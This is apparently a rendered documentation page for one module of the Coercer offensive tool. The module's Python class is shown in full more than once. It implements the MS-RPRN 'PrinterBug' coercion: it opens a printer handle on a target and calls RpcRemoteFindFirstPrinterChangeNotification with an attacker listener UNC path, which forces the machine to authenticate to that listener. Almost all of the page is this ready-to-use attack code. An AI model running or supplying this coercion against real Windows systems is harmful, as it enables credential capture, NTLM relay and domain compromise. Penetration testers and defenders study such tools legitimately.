coercer.methods.MS_RPRN.RpcRemoteFindFirstPrinterChangeNotification
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : RpcRemoteFindFirstPrinterChangeNotification.py
# Author             : Podalirius (@podalirius_)
# Date created       : 15 Sep 2022

from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
# NOTE(review): DCERPCSessionError is imported but never referenced in this file.
from coercer.network.DCERPCSessionError import DCERPCSessionError
from impacket.dcerpc.v5 import rprn
from impacket.dcerpc.v5.dtypes import NULL


class RpcRemoteFindFirstPrinterChangeNotification(MSPROTOCOLRPCCALL):
    """
    Coerces a machine into authenticating via function
    RpcRemoteFindFirstPrinterChangeNotification (opnum 62) of [MS-RPRN]:
    Print System Remote Protocol
    (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b8b414d9-f1cd-4191-bb6b-87d09ab2fd83).

    The class-level attributes (``exploit_paths``, ``access``, ``protocol``,
    ``function``) are plain data; presumably the framework reads them through
    the MSPROTOCOLRPCCALL base class, which is not visible in this file.

    Method found by:
     -
    """

    # (transport, path template) pairs. '{{listener}}' looks like a placeholder
    # substituted outside this class -- the substitution is not visible here.
    exploit_paths = [
        ("smb", '\\\\{{listener}}\x00'),
    ]

    # Transports / endpoints over which the call can be issued.
    # NOTE(review): the first key is spelled 'ncan_np' while the second uses the
    # 'ncacn_' prefix; kept byte-for-byte because the lookup side is not visible.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\spoolss",
                "uuid": "12345678-1234-abcd-ef00-0123456789ab",
                "version": "1.0",
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "12345678-1234-ABCD-EF00-0123456789AB",
                "version": "1.0",
            },
        ],
    }

    # Human-readable protocol identifiers.
    protocol = {
        "longname": "[MS-RPRN]: Print System Remote Protocol",
        "shortname": "MS-RPRN",
    }

    # RPC function metadata; 'pszLocalMachine' is the argument that receives
    # self.path in trigger().
    function = {
        "name": "RpcRemoteFindFirstPrinterChangeNotification",
        "opnum": 62,
        "vulnerable_arguments": ["pszLocalMachine"],
    }

    def trigger(self, dcerpc_session, target):
        """Open a printer handle on *target* and issue the change-notification call.

        Args:
            dcerpc_session: a connected impacket DCERPC binding, or None.
            target: host name or address; embedded in the printer name handed
                to ``rprn.hRpcOpenPrinter``.

        Returns:
            ``""`` when the request completed without raising; the caught
            exception object when any step inside the ``try`` raised (callers
            are expected to inspect the return type); ``None`` when
            ``dcerpc_session`` is None, after printing an error.

        Notes:
            The printer handle returned by ``hRpcOpenPrinter`` is not closed by
            this method. ``self.path`` is not assigned in this class -- presumably
            set by the base class from ``exploit_paths``; verify against it.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None

        try:
            printer_name = '\\\\%s\x00' % target
            open_resp = rprn.hRpcOpenPrinter(dcerpc_session, printer_name)

            call = rprn.RpcRemoteFindFirstPrinterChangeNotification()
            call['hPrinter'] = open_resp['pHandle']
            call['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
            # Flag/option semantics:
            # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/41d5c622-ec77-49ff-95e3-69b325ce4e77
            call['fdwOptions'] = 0x00000000
            call['pszLocalMachine'] = self.path
            call['dwPrinterLocal'] = 0
            call['cbBuffer'] = NULL
            call['pBuffer'] = NULL

            # The response is not used; only whether the call raised matters here.
            dcerpc_session.request(call)
            return ""
        except Exception as err:
            return err
class
RpcRemoteFindFirstPrinterChangeNotification(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
class RpcRemoteFindFirstPrinterChangeNotification(MSPROTOCOLRPCCALL):
    """
    Coerces a machine into authenticating via function
    RpcRemoteFindFirstPrinterChangeNotification (opnum 62) of [MS-RPRN]:
    Print System Remote Protocol
    (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b8b414d9-f1cd-4191-bb6b-87d09ab2fd83).

    The class-level attributes (``exploit_paths``, ``access``, ``protocol``,
    ``function``) are plain data; presumably the framework reads them through
    the MSPROTOCOLRPCCALL base class, which is not visible in this file.

    Method found by:
     -
    """

    # (transport, path template) pairs. '{{listener}}' looks like a placeholder
    # substituted outside this class -- the substitution is not visible here.
    exploit_paths = [
        ("smb", '\\\\{{listener}}\x00'),
    ]

    # Transports / endpoints over which the call can be issued.
    # NOTE(review): the first key is spelled 'ncan_np' while the second uses the
    # 'ncacn_' prefix; kept byte-for-byte because the lookup side is not visible.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\spoolss",
                "uuid": "12345678-1234-abcd-ef00-0123456789ab",
                "version": "1.0",
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "12345678-1234-ABCD-EF00-0123456789AB",
                "version": "1.0",
            },
        ],
    }

    # Human-readable protocol identifiers.
    protocol = {
        "longname": "[MS-RPRN]: Print System Remote Protocol",
        "shortname": "MS-RPRN",
    }

    # RPC function metadata; 'pszLocalMachine' is the argument that receives
    # self.path in trigger().
    function = {
        "name": "RpcRemoteFindFirstPrinterChangeNotification",
        "opnum": 62,
        "vulnerable_arguments": ["pszLocalMachine"],
    }

    def trigger(self, dcerpc_session, target):
        """Open a printer handle on *target* and issue the change-notification call.

        Args:
            dcerpc_session: a connected impacket DCERPC binding, or None.
            target: host name or address; embedded in the printer name handed
                to ``rprn.hRpcOpenPrinter``.

        Returns:
            ``""`` when the request completed without raising; the caught
            exception object when any step inside the ``try`` raised (callers
            are expected to inspect the return type); ``None`` when
            ``dcerpc_session`` is None, after printing an error.

        Notes:
            The printer handle returned by ``hRpcOpenPrinter`` is not closed by
            this method. ``self.path`` is not assigned in this class -- presumably
            set by the base class from ``exploit_paths``; verify against it.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None

        try:
            printer_name = '\\\\%s\x00' % target
            open_resp = rprn.hRpcOpenPrinter(dcerpc_session, printer_name)

            call = rprn.RpcRemoteFindFirstPrinterChangeNotification()
            call['hPrinter'] = open_resp['pHandle']
            call['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
            # Flag/option semantics:
            # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/41d5c622-ec77-49ff-95e3-69b325ce4e77
            call['fdwOptions'] = 0x00000000
            call['pszLocalMachine'] = self.path
            call['dwPrinterLocal'] = 0
            call['cbBuffer'] = NULL
            call['pBuffer'] = NULL

            # The response is not used; only whether the call raised matters here.
            dcerpc_session.request(call)
            return ""
        except Exception as err:
            return err
Coerces a machine into authenticating by calling function RpcRemoteFindFirstPrinterChangeNotification (opnum 62) of [MS-RPRN]: Print System Remote Protocol (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b8b414d9-f1cd-4191-bb6b-87d09ab2fd83)
Method found by: -
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\spoolss', 'uuid': '12345678-1234-abcd-ef00-0123456789ab', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': '12345678-1234-ABCD-EF00-0123456789AB', 'version': '1.0'}]}
function =
{'name': 'RpcRemoteFindFirstPrinterChangeNotification', 'opnum': 62, 'vulnerable_arguments': ['pszLocalMachine']}
def
trigger(self, dcerpc_session, target):
def trigger(self, dcerpc_session, target):
    """Open a printer handle on *target* and issue the change-notification call.

    Args:
        dcerpc_session: a connected impacket DCERPC binding, or None.
        target: host name or address; embedded in the printer name handed
            to ``rprn.hRpcOpenPrinter``.

    Returns:
        ``""`` when the request completed without raising; the caught
        exception object when any step inside the ``try`` raised (callers
        are expected to inspect the return type); ``None`` when
        ``dcerpc_session`` is None, after printing an error.

    Notes:
        The printer handle returned by ``hRpcOpenPrinter`` is not closed by
        this method. ``self.path`` is not assigned here -- presumably set by
        the base class from ``exploit_paths``; verify against it.
    """
    if dcerpc_session is None:
        print("[!] Error: dce is None, you must call connect() first.")
        return None

    try:
        printer_name = '\\\\%s\x00' % target
        open_resp = rprn.hRpcOpenPrinter(dcerpc_session, printer_name)

        call = rprn.RpcRemoteFindFirstPrinterChangeNotification()
        call['hPrinter'] = open_resp['pHandle']
        call['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
        # Flag/option semantics:
        # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/41d5c622-ec77-49ff-95e3-69b325ce4e77
        call['fdwOptions'] = 0x00000000
        call['pszLocalMachine'] = self.path
        call['dwPrinterLocal'] = 0
        call['cbBuffer'] = NULL
        call['pBuffer'] = NULL

        # The response is not used; only whether the call raised matters here.
        dcerpc_session.request(call)
        return ""
    except Exception as err:
        return err